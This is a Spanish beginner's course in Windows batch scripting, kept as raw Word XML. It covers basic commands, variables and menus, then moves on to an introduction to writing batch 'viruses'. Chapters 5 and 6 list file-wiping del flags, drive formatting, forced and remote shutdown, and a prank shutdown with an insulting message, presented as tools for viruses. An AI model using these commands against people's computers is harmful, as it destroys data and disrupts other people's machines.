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F1" w:rsidRPr="006426F1" w:rsidRDefault="006426F1" w:rsidP="006426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color w:val="FF0022"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">CURSO DE PROGRAMACION EN BATCH PARA PRINCIPIANTES </w:t>
      </w:r>
      <w:r w:rsidRPr="006426F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0022"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">A AQUELLAS PERSONAS QUE COMIENZAN A PROGRAMAR </w:t>
      </w:r>
      <w:r w:rsidRPr="006426F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0022"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:br/>
        <w:t>POR TXSHACK</w:t>
      </w:r>
    </w:p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INRODUCCION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Este curso va destinado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Newbies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aun no han comenzado a programar. Intentare explicarlo todo lo mas claro y preciso que pueda. Si ustedes ya han programado alguna vez, no se molesten en leerlo, no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aprenderan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nada nuevo puesto que como ya e dicho, es para aprender.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curso lo are por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capitulos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escriviendo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uno cada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dos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dias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que vallan con calma y practicando lo aprendido. Les recomiendo hacer los ejercicios ustedes mismos a la vez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curso para que puedan aprender bien.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unicos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requisitos son; el bloc de notas, paciencia e intentar entender lo que se hace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br/>
        <w:t xml:space="preserve">CAPITULO UNO: </w:t>
      </w:r>
      <w:r w:rsidRPr="006426F1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br/>
        <w:t>MI PRIMER PROGRAMA .BAT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En este primer capitulo crearemos nuestro primer programa, usando los comandos mas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basicos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programcion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batch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Abran el bloc de notas.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continuacion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@echo off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empesemos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siempre el programa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continuacion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escriviremos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titulo del programa, para ello pondremos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title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seguido de su titulo, ejemplo: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mi primer programa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De esta forma nuestro programa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tendra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nombre de, "mi primer programa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"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Ahora les mostrare una serie de comandos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basicos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aprender, les aconsejo que lo apunten en un papel para tenerlos siempre presentes.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gram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echo</w:t>
      </w:r>
      <w:proofErr w:type="gram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.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sirve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dejar un espacio de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linea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programa. Es lo equivalente a pulsar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intro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word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echo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este sirve para mostrar un mensaje en el programa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rem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este sirve para mostrar un mensaje pero que no se vera en el programa, es decir tan solo se vera en el modo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ediciom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osea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donde estamos ahora, en el bloc de notas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..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suel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escrivirse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tus aclaraciones, y que no te parezca lioso, por ejemplo decir, asta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introduccion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asta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las preguntas,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apartir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acabando las operaciones...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pause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sirve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pausa en el programa, es decir, una vez llegados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nos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programa... pulse una tecla para continuar... en cambio si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pause &gt;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nos lo preguntara, es decir, daremos una tecla y continuara.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exit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sirve para acabar el programa, para salir de el....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Bien una vez dicho esto, podremos crear nuestro primer programa.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Abran el bloc de notas si aun no lo han echo y escriban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..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mi primer programa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comentario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este es mi primer programa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jejeje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siiiiii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rem y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aca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ya se acaba, esto no lo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leere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pero me sirve de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aclaracion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4D41D5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Aora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le dan a guardar como y lo llaman por ejemplo 1ºprogramacontxshack.bat o lo que quieran, pero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ser loquesea.bat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Aora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a creado un programa que tiene el icono como de una ventana blanca con una rueda dentada dentro, pues ese es nuestro programa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!!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ejecutenlo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vean!!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Despues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intenten entender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codigo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 sencillo que es...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En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proximo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capitulo les enseñare como hacer que el programa te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preguntas y tu responderlas...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No se impacienten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!!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jeje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Espero que les ayude.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  <w:t xml:space="preserve">Un saludo,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 w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>CAPITULO 2: LAS VARIABLES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Espero que les quedase claro lo que dimos en el capitulo numero. Fue una cosa sencilla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Ahora pasaremos a las variables.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Una variable, es una especie de memoria a la que podemos asignarle un dato,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acerlo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referencia mas adelante. Para entenderlo, lo mejor es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ejemplo.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ejemplos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=capullo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echo eres un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pause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Como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comenzamos con @echo off y seguimos poniendo un titulo, en este caso lo he llamado ejemplos. (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asta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aki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ya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sabian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no??)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continuacion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 poner set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=capullo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la palabra capullo se muestre cuando ponemos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entre %% de esta forma, cuando ponemos eres un %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% el programa nos muestra, eres un capullo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jejeje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esto es un ejemplo, vean.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3.8pt;height:23.8pt"/>
        </w:pic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han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visto no?? </w:t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pueden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todo lo que se les ocurra...lo q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recordar es que tiene q empezar por set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unapalabra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=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loquequieras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luego referencia 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loquequieras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menten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entre %% la palabra seguida de set, de esta forma %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unapalabra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%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por si no les quedo claro, les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pondre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otro ejemplo..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mejor es que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ustedes mismos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tambien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ejemplo2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 uno=soy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 dos=espero que aprendas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hola amigos %uno%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%dos%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pause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Espero que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ayan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entendido ya...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Ahora pasemos a otro tipo de variables, son muy parecidas.... Estas hacen que puedas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algo, y q el que ejecute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responda,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mas tarde referencia a esa respuesta... Con un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peqeño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ejemplo lo veremos mejor...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ejemplo3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nombre= ¿como te llamas?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set/p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edad= ¿y cuantos años tienes?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te llamas %nombre% y tienes %edad% años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Han entendido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seria el resultado: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shape id="_x0000_i1026" type="#_x0000_t75" alt="Image" style="width:23.8pt;height:23.8pt"/>
        </w:pic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Ahora les enseñare otros comandos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deverian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sumar a los del primer capitulo... (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esos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les dije apuntasen en un papel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jeje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Esos comandos son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suiguientes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set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xxxxx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=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xxxxx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set/p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xxxx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=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xxxxx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No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falta explicar cada una de nuevo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cls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no la e empleado aun, pero sirve para limpiar lo anterior escrito.....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imaginen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programa como el anterior, en que preguntamos nombre, edad, donde vives, apellidos...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cuando digamos lo de te llamas ....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y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apellidas ... y años.... para que no quede todo en pantalla y nos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lio, ponemos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cuando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llege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ahy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borrara lo anterior y continuara con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codigo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Benga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les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ejemplo...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lastRenderedPageBreak/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ejemplo4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nombre= ¿como te llamas?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set/p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edad= ¿y cuantos años tienes?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set/p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vive= ¿y donde vives?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te llamas %nombre% y tienes %edad% años y vives en %vive%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han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visto no??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hacen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codigos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lo menos les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aconsego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den a copiar y pegar para que les sirva de ejemplo. Vallan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provando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 la mejor forma de acordarte de ello y coger soltura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Y bueno, si se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quedado con esto... por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oy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ya es bastante...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Ah!!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ultima cosa..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les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voy a dar ya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codigos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colores para que experimenten a cambiar el color a la ventana del programa. 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facil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usar,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poner, color seguido de un numero y letra (color de letras y de fondo)...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prueven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CODIGO DE COLORES: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0 = Negro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1 = Azul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2 = Verde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3 = Aguamarina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4 = Rojo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5 = Púrpura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6 = Amarillo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7 = Blanco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8 = Gris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9 = Azul claro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 = Verde claro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 = Aguamarina claro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 = Rojo claro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D = Púrpura claro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 = Amarillo claro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F = Blanco brillante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Os dejo un ejemplo del anterior, ejmplo3, para que vean como se meten los colores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ejemplo4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color 5e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nombre= ¿como te llamas?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set/p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edad= ¿y cuantos años tienes?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set/p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vive= ¿y donde vives?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color 2f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te llamas %nombre% y tienes %edad% años y vives en %vive%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shape id="_x0000_i1027" type="#_x0000_t75" alt="Image" style="width:23.8pt;height:23.8pt"/>
        </w:pic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Espero que asta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hallan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entendido, si necesitan alguna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aclaracion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no entienden algo. No duden en postear.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Continuaremos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proximo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Un saludo.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 w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>CAPITULO 3: VARIABLES -CONTINUACION-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En esta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ocasion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os explicare otro tipo de variables, que se utilizan para hacer operaciones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matematicas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Su base y modo de empleo es similar a las del capitulo anterior (las set/p).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Estas en vez de set/p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xxx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= se llaman set/a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xxx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=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Sirve por ejemplo para realizar medias, porcentajes...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Lo mejor es ver un ejemplo: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Por cierto, antes de mostrar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codigo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se acuerdan del comando rem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aparece en el 1º capitulo, y se usa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aclaraciones a la hora de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codigo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pero q luego en el programa no se vera. Os lo digo porque lo utilizare para irles explicando.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VEAN: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calcula tus notas medias con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color 0c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rem como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veran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este color establece las letras rojas y el fondo negro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set/p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a=¿cual es tu nota en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matematicas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b=¿cual es tu nota en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tecnologia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c=¿cual es tu nota en lengua?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d= ¿cual es tu nota en ingles?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e=¿cual es tu nota en sociales?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set/p f=¿cual es tu nota en dibujo?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rem esto lo comprenden no? e establecido notas a una serie de variables q ya conocen del capitulo anterior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set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asig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=6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rem esto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tambien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deven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saberlo ya...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asi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lo que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acemos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 dotar la palabra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asig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con el valor 6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set/a suma=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a+b+c+d+e+f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rem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aqui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sumamos las medias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set/a media=%suma%/%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asig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rem como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veran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al dividir la suma entre las asignaturas sacamos la media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tu nota media es de : %media%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estudia mas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cabron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consejo de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Se me olvidaba decir que no muestra decimales, es decir si tu media es de 5,25 veras 5... ¿¡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qereis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!? </w:t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jeje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Espero que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ayais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entendido.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Los comandos de las operaciones son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suma+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resta -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producto *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division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/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exponente ^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HASTA EL PROXIMO DIA!!</w:t>
      </w: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CAPITULO 4: IF, GOTO, MENUS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Bueno, en este 4º capitulo, os explicare 2 sencillos comandos (el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goto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el de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estructuracion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), y otro algo mas complicado (el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pero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vereis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con un poco de practica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tambien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chupado.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comando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goto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nos permite dar un salto a un determinado lugar del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Por ejemplo para ir a un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menus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nos permiten hacer "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" o apartados en nuestro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hacen </w:t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escriviendo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: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seguido el nombre del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(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ejemplo de luego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vereis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mas claro)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comando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sirve para establecer una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condicion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 decir, si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condicion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cumple o no, se ara tal cosa.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comando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dispone de los siguientes atributos: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variable==valor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expresar si la variable es igual a valor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az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esto)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variable LSS valor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expresar si la variable es menor a valor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az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esto)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variable GTR valor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expresar si la variable es mayor a valor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az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esto)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variable LEQ valor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(para expresar si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variablees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menor o igual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az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esto)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variable GEQ valor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expresar si la variable es mayor o igual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az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esto)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Para ver mas claro esto del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goto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lo de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pondre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simple ejemplo.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</w:t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responde si o no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/p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=quieres convertirte en hacker??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%==si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serh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%==no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noh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serh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pues entonces sigue los consejos de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noh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pues entonces que coño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aces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leyendo esto??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adios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Han comprendido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sencillo.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os dejo otro ejemplo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¿que numero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sera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...?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deves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averiguar el numero para poder salir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/p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=pon un numero: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%==5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si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% LSS 5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menor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%Var% GTR 5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mayor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:si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correcto!!! </w:t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por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culo te la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inco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!! </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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jaja</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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salir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:menor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elije otro mas alto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sigue jugando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:mayor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elije otro mar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pekeño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!!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sigue probando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:salir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asta otro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dia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!!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un saludo,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Ya lo abran pillado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Tambien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pueden usar el comando </w:t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not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hace lo contrario que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En vez de decir SI pasa esto....haz esto, lo que hace es decir, SI NO pasa esto...haz esto. ¿Entienden no???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sino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ejemplo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facil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Se preguntaran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tambien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pasa, cuando por ejemplo en el 1º ejemplo que puse, en vez de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 o no, escribimos otra cosa, entonces lo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sucedera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 que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lenguage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al ser lineal,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pasra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la siguiente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linea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... sin importar lo q pongamos (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pruevenlo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Pero no se preocupen todo esto tiene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solucion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un comando llamado </w:t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else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qiere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decir es sino haz esto, es decir, por ejemplo decimos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if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vari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%=1 (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menu1) else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menu2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qiere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decir esto, es que si la variable es 1, vallamos al menu1, sino, al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menu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2.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La sintaxis seria esta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condiciones (accion1) ELSE accion2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La 1º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ir entre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parentesis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obligatoriamente.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Vean un ejemplo les quedara mas claro...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En el ejemplo se trata de decir si quieres un CONSEJO o si quieres SALIR, si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escrives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cualqier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otra cosa,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vuelve al principio, y no pasa como en los ejemplos de antes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lastRenderedPageBreak/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@</w:t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title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di soy bobo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que quieres? consejo o salir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set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/p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=dime, consejo o salir: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%==consejo (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consejo)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else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if2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:if2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%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%==salir (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)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else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menu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:consejo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ten cuidado con lo que descargas,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fiate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solo de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el es legal!!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pause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&gt;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nul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goto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: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echo.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gram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echo</w:t>
            </w:r>
            <w:proofErr w:type="gram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adios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!!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pause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Bueno, y con todo esto acabo por hoy. Creo que son bastantes cosas por hoy no creen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Pronto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seguire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Un saludo;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Pr="006426F1" w:rsidRDefault="006426F1" w:rsidP="00642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 w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>CAPITULO 5: ULTIMOS COMANDOS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Bien, si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entendido lo anterior, ya es el momento de que sepan el resto de comandos, y experimenten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prueven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ustedes mismos.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En este capitulo, os enseñare el resto de comandos interesantes, y para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proximo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capitulo, nos meteremos con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virus, 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surgiendo nuevas cosas y comandos.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Bien, estos son los comandos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basicos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recordar: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del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borra archivos, por ejemplo: del c:/ruta/del/archivo/juego.exe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/P Pide confirmación en cada caso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/F Modo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force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Borra incluso los archivos de solo lectura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/S Borra también los subdirectorios.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/Q Modo silencioso. No pide confirmación en ningún caso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borra el directorio de raid, por ejemplo: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:/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ruta/directorio/raiz borrara ese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dir.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star</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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comienza algo, por ejemplo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star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hyperlink r:id="rId4" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="006426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www.infiernohacker.mundoforo.com</w:t>
        </w:r>
      </w:hyperlink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taskkill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mata un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porceso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puede ser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tambien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taskkill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/f (fuerza bruta) ejemplo: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taskkill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iexplore.exe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format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unidad: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formatea una unidad, por ejemplo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msg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*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hace que aparezca un mensaje en una ventana de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ejemplo;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msg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*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adios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!!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y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te olvides de visitar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infiernohacker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reg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añade lo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qeramos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la ruta del registro especificada...(ya lo veremos mas adelante)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&gt; y &gt;&gt;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son unos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redireccionamientos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ejemplo, si ponemos echo hola&gt;hola.txt se nos creara en el directorio actual, un archivo de texto con el titulo de hola, y que si lo abrimos veremos la palabra hola.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Si por ejemplo ahora creamos otro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echo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adios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&gt;&gt;hola.txt En el archivo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teniamos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anteriormente, se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seguira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llamando hola, pero al abrirlo veremos que pone hola y en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linea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siguiente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adios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Pero si por el contrario ponemos echo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adios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&gt;hola.txt Al abrir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arvhivo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solo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aparecera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palabra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adios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Espero que lo hayan entendido... en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brebes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palabras_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&gt; crea o remplaza un archivo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&gt;&gt;salta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asta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linea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siguiente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ejemplo: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&gt;hola.txt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exit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Esto nos creara en el directorio actual, un archivo llamado hola.txt y en su interior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pontra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*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* sirve para sustituir a todos los caracteres... por ejemplo si ponemos del *.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jpg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borrara todos los archivos con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extension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jpg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del a*.jpg borrara todos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jpg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empiezen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a sea cual sea su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continuacion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?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parecido al anterior, solo que sustituye a un solo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caracter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ejemplo si ponemos del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c?sa.jpg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borrara todos los archivos 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jpg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comienzen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c (un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caracter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cualquiera)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ejemplo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borraria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; casa.jpg cosa.jpg cesa.jpg cssa.jpg.... entienden no?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El *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y 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sirve tanto para el nombre como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extension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.... No voy a liarme mucho en esto, porque es algo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facil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seguro que lo entienden. Les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pondre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algun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ejemplo que seguro q entienden.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.* (archivos c -un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caracter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-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de cualquier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extension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*asa*.b* ( -cualquier cosa- asa -cualquier cosa-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extension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 + lo que sea)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CHDIR o CD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[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path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&gt;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Cambia al directorio indicado.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CD \"c:\\archivos de programa\" Trasladarse al directorio Archivos de programa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CD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..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Trasladarse al directorio superior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CD \\ Trasladarse al raíz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ATTRIB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[/S&gt; [archivo&gt;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Muestra los atributos de los archivos indicados y en su caso permite cambiarlos.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Con el parámetro /S busca también en subdirectorios.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Los atributos son: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H -&gt; oculto. Se activa con +h y desactiva con -h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R -&gt; Lectura. Solo lectura con +r, normal con -r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 -&gt; Sistema. Se activa con +s y desactiva con -s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 -&gt; Modificado. Para copias de seguridad incrementales. +a indica modificado y -a indica no modificado.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ATTRIB archivo.txt Muestra los atributos de ese archivo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ATTRIB -r archivo.txt Pone el atributo solo lectura a archivo.txt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Attrib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miarchivo.txt (mostrar los atributos de miarchivo.txt)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attrib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*.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+r +r +s (pone a todos los archivos con extensión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ocultos, del sistema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read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only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shutdown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este comando, depende de las letras que lo acompañen, puede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cosa u otra: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si esta seguido de -r se reiniciara el equipo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-s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apage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-f forzara a cerrarse todos programas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-t 15 indica el tiempo...en este caso 15 segundos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-c " " lo que va entre comillas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mensaje...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pongamos un ejemplo_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shutdown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-r -f -t 12 -c "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jodete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" esto ara q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reinicie (-r) que se cierren todos los programas forzosamente (-f) que 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12 segundos (-t 12) y salga un mensaje q diga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jodete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6426F1" w:rsidRPr="006426F1" w:rsidRDefault="006426F1" w:rsidP="00642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8" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hrnoshade="t" o:hr="t" fillcolor="black" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="006426F1" w:rsidRDefault="006426F1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Estos comandos, junto a los q ya conocen: set/p, pause, pause &gt;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exit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echo,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if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goto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....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son los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basicos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Como ya les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dijen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puede que ahora se me escape alguno...pero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cuado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veamos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virus y programas,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apareciendo los que me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ayan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quedado. De momento creo que con estos tenemos por hoy ^^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Cuando pueda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seguire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Un saludo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</w:p>
    <w:p w:rsidR="006426F1" w:rsidRDefault="006426F1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 w:rsidP="006426F1">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>CAPITULO 6: INICIACION A LA CREACION DE VIRUS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Como ya os </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>habia</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> dicho, a partir de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aqui</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, comenzaremos con la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>creacion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de virus. </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Epezare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> con lo mas importante acerca de esto, y ya iremos </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>abanzando</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Posiblemente repita algunas cosas ya explicadas brevemente, como el comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shutdown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, pero creo que es importante repetirlo (profundizando algo mas) en este tema. </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Introduccion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Buenas , ante todo he de decir que esto es un manual de introducción y no un manual para expertos. En este manual se hablara sobre los virus .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (archivos por lotes ejecutables de ms-dos) </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">¿Qué es un comando? </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>es</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> una orden que le damos al sistema operativo para que haga una tarea determinada. </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>explicación</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>: @echo off</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Desabilita</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> el echo para que no muestre los comandos , que se ejecutaran posteriormente. </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>explicación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shutdown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">es un comando con el que puedes jugar bastante. -s y -t son </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parametros</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, los </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parametros</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> son como las opciones </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">que les </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>deves</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> dar al comando. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>algunos</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> comandos requieren </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parametros</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> obligatoriamente sin embargo otros no. </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>explicación</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parametro</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -s y -t </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parametro</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -s da la orden a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shutdown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> para que </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>apage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> el equipo y con -t especificamos los segundos. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>en</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> el ejemplo </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">de antes pusimos 1 segundo. </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>otros</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parametros</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shutdown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shutdown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -r = Reinicia </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shutdown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -c = deja un comentario "Modo de uso"&gt;&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shutdown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -s -t 5 c "Comentario" </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shutdown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -m = apaga un equipo de la red "Modo de uso"&gt;&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shutdown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -s -t 4 -m \\nombredehost </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shutdown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -f = fuerza el cierre de las aplicaciones. </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Comandos básicos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">a continuación os pondré varios comandos que sirven mucho a la hora de hacer virus. </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">-del = borra un archivo </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>copy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = copia un archivo </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = hacer modificaciones en el registro </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">-net = Muchas funciones, escriban en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> net /</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> para ver sus funciones </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES" w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="142875" cy="142875"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="9" name="Imagen 9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-RD = elimina un directorio </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">-set = Muestra , establece, crea , variables de entorno de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>-</w:t>
      </w:r>
